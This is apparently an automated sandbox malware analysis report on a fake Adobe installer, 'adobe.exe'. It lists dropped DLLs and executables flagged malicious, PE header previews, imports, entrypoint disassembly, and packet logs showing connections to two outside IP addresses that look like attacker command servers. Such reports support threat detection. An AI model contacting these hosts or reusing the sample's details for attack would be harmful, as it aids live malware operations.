                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):13312
                                                                                                                                                        Entropy (8bit):5.745960477552938
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                                                                        MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                                                                        SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                                                                        SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                                                                        SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_setup64.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6144
                                                                                                                                                        Entropy (8bit):4.215994423157539
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_shfoldr.dll

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):23312
                                                                                                                                                        Entropy (8bit):4.596242908851566
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\adobe.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):704512
                                                                                                                                                        Entropy (8bit):6.498045515703036
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:ZRObekMtkfohrPUs37uzHnA6zgpKq35eERXprNrHIR3/j1vGgZpDExyc:jObekYkfohrP337uzHnA6cgqpeEFHS9A
                                                                                                                                                        MD5:EAF0354C6EA59246416F73EC28FB11AF
                                                                                                                                                        SHA1:EE6CF822FF6D82F4AE958D90EEBA282D5EF48DA1
                                                                                                                                                        SHA-256:958C0E917DA7DF3215B28005FAE0ACACDBA44CE4AFA8BCDCED6AAFC1357D7FEE
                                                                                                                                                        SHA-512:68BDF0502F0432BE7F45FE41B16D0D0FD9F8BF69613651C5BF0E26307F8B404EB32E19155538C44925950ADA495E4FC524EE07A6AAA34F2284D6718B49501150
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f..........pr............@..............................................@...............................%..................................................................................................................CODE.....d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Entropy (8bit):7.998783197769266
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        File name:adobe.exe
                                                                                                                                                        File size:4'855'286 bytes
                                                                                                                                                        MD5:e9a2997ee4cfb48cb3988f3048e041e9
                                                                                                                                                        SHA1:303d4cb34333e085c47ec565a25abcfa2376db6e
                                                                                                                                                        SHA256:6b05ea2717ccbe9837f6b5108900f96c169d9e252b595ddfec97b071fb67dcae
                                                                                                                                                        SHA512:a8f65dc8df2d15d2201f6acae8d358b370f2df7dce0713358f2f01b0a8dd06e5fe0357d63e4b254f8300df28fd22146b0b79a516ce6f31a36d61fecbcfd4bbe0
                                                                                                                                                        SSDEEP:98304:QImrB3xNJVSKxvPROQR9FMrBcbYQ6RF+I5GtvB7waAipLdAP95g:HS3xNJMKxXkwFMrBu9m+VfDldQ95g
                                                                                                                                                        TLSH:21263324FD732332C5B20CB89A66BF1774346C3F92F994352ADC4DFD5BA7542A6022A1
                                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:2d2e3797b32b2b99

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x409c40
                                                                                                                                                        Entrypoint Section:CODE
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:1
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:1
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:1
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        push ebp
                                                                                                                                                        mov ebp, esp
                                                                                                                                                        add esp, FFFFFFC4h
                                                                                                                                                        push ebx
                                                                                                                                                        push esi
                                                                                                                                                        push edi
                                                                                                                                                        xor eax, eax
                                                                                                                                                        mov dword ptr [ebp-10h], eax
                                                                                                                                                        mov dword ptr [ebp-24h], eax
                                                                                                                                                        call 00007FE0E062441Bh
                                                                                                                                                        call 00007FE0E0625622h
                                                                                                                                                        call 00007FE0E06258B1h
                                                                                                                                                        call 00007FE0E06278E8h
                                                                                                                                                        call 00007FE0E062792Fh
                                                                                                                                                        call 00007FE0E062A25Eh
                                                                                                                                                        call 00007FE0E062A3C5h
                                                                                                                                                        xor eax, eax
                                                                                                                                                        push ebp
                                                                                                                                                        push 0040A2FCh
                                                                                                                                                        push dword ptr fs:[eax]
                                                                                                                                                        mov dword ptr fs:[eax], esp
                                                                                                                                                        xor edx, edx
                                                                                                                                                        push ebp
                                                                                                                                                        push 0040A2C5h
                                                                                                                                                        push dword ptr fs:[edx]
                                                                                                                                                        mov dword ptr fs:[edx], esp
                                                                                                                                                        mov eax, dword ptr [0040C014h]
                                                                                                                                                        call 00007FE0E062AE2Bh
                                                                                                                                                        call 00007FE0E062AA5Eh
                                                                                                                                                        lea edx, dword ptr [ebp-10h]
                                                                                                                                                        xor eax, eax
                                                                                                                                                        call 00007FE0E0627F18h
                                                                                                                                                        mov edx, dword ptr [ebp-10h]
                                                                                                                                                        mov eax, 0040CDE8h
                                                                                                                                                        call 00007FE0E06244C7h
                                                                                                                                                        push 00000002h
                                                                                                                                                        push 00000000h
                                                                                                                                                        push 00000001h
                                                                                                                                                        mov ecx, dword ptr [0040CDE8h]
                                                                                                                                                        mov dl, 01h
                                                                                                                                                        mov eax, 0040738Ch
                                                                                                                                                        call 00007FE0E06287A7h
                                                                                                                                                        mov dword ptr [0040CDECh], eax
                                                                                                                                                        xor edx, edx
                                                                                                                                                        push ebp
                                                                                                                                                        push 0040A27Dh
                                                                                                                                                        push dword ptr fs:[edx]
                                                                                                                                                        mov dword ptr fs:[edx], esp
                                                                                                                                                        call 00007FE0E062AE9Bh
                                                                                                                                                        mov dword ptr [0040CDF4h], eax
                                                                                                                                                        mov eax, dword ptr [0040CDF4h]
                                                                                                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                                                                                                        jne 00007FE0E062AFDAh
                                                                                                                                                        mov eax, dword ptr [0040CDF4h]
                                                                                                                                                        mov edx, 00000028h
                                                                                                                                                        call 00007FE0E0628BA8h
                                                                                                                                                        mov edx, dword ptr [000000F4h]

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        CODE0x10000x93640x9400False0.6148648648648649data6.56223225792919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        DATA0xb0000x24c0x400False0.3154296875data2.753482278202086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        BSS0xc0000xe4c0x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .idata0xd0000x9500xa00False0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .tls0xe0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .rdata0xf0000x180x200False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0x100000x8b40x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0x110000x2c000x2c00False0.3231534090909091data4.458098236885354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                                                                        RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                                                                        RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                                                                        RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                                                                        RT_STRING0x125740x2f2data0.35543766578249336
                                                                                                                                                        RT_STRING0x128680x30cdata0.3871794871794872
                                                                                                                                                        RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                                                                                        RT_STRING0x12e440x68data0.75
                                                                                                                                                        RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                                                                                        RT_STRING0x12f600xaedata0.5344827586206896
                                                                                                                                                        RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                                                                                        RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                        RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.28228476821192056
                                                                                                                                                        RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                                                                        user32.dllMessageBoxA
                                                                                                                                                        oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                                                                                        kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                                                                        user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                                                                                        comctl32.dllInitCommonControls
                                                                                                                                                        advapi32.dllAdjustTokenPrivileges

                                                                                                                                                        Possible Origin

                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        DutchNetherlands
                                                                                                                                                        EnglishUnited States

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 13, 2024 06:32:50.066613913 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.252819061 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.252942085 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.253227949 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.440485954 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.482608080 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.482676029 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.482769966 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.482775927 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.482810020 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.482810974 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.482831955 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.482851982 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.482891083 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.482892036 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:50.487788916 CET497362023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:50.696322918 CET20234973665.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.696405888 CET497362023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:50.696504116 CET497362023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:50.696589947 CET497362023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:50.904870033 CET20234973665.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.904982090 CET20234973665.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:50.905002117 CET497362023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:51.114022017 CET20234973665.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:51.114131927 CET20234973665.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:51.162251949 CET497362023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:53.119539976 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:53.306019068 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.401035070 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.401144981 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:53.510107994 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:53.696444035 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.732130051 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.732162952 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.732180119 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.732204914 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.732218981 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:53.732223988 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.732273102 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:53.732273102 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:53.732301950 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:53.735656977 CET497382023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:53.944207907 CET20234973865.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:53.944364071 CET497382023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:53.944452047 CET497382023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:53.944480896 CET497382023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:53.944523096 CET497382023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:54.059176922 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.059952021 CET4973980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.152597904 CET20234973865.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.152656078 CET20234973865.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.152690887 CET20234973865.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.153258085 CET20234973865.109.80.185192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.153464079 CET497382023192.168.2.465.109.80.185
                                                                                                                                                        Jan 13, 2024 06:32:54.245136976 CET8049735185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.246010065 CET8049739185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.246113062 CET4973580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.246144056 CET4973980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.247020006 CET4973980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.433665991 CET8049739185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.473670959 CET8049739185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.473870993 CET4973980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.588351965 CET4973980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.589015007 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.774772882 CET8049739185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.774962902 CET4973980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.775068045 CET8049740185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.775203943 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.775568962 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:54.967932940 CET8049740185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.992610931 CET8049740185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:54.992688894 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.106118917 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.331656933 CET8049740185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:55.331852913 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.449701071 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.450196981 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.635859013 CET8049740185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:55.635956049 CET4974080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.636006117 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:55.636106014 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.636356115 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.822384119 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:55.852837086 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:55.852941990 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:55.962891102 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:56.184292078 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:56.184398890 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:56.291934967 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:56.509675980 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:56.509928942 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:56.619421959 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:56.836061001 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:56.836170912 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:56.947837114 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.171179056 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:57.171305895 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.293560028 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.294080019 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.479914904 CET8049741185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:57.479973078 CET8049742185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:57.480030060 CET4974180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.480087042 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.480485916 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.666487932 CET8049742185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:57.697202921 CET8049742185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:57.697412968 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:57.807179928 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.023518085 CET8049742185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.023590088 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.135067940 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.360673904 CET8049742185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.361965895 CET8049742185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.362065077 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.478743076 CET4974280192.168.2.4185.196.8.22
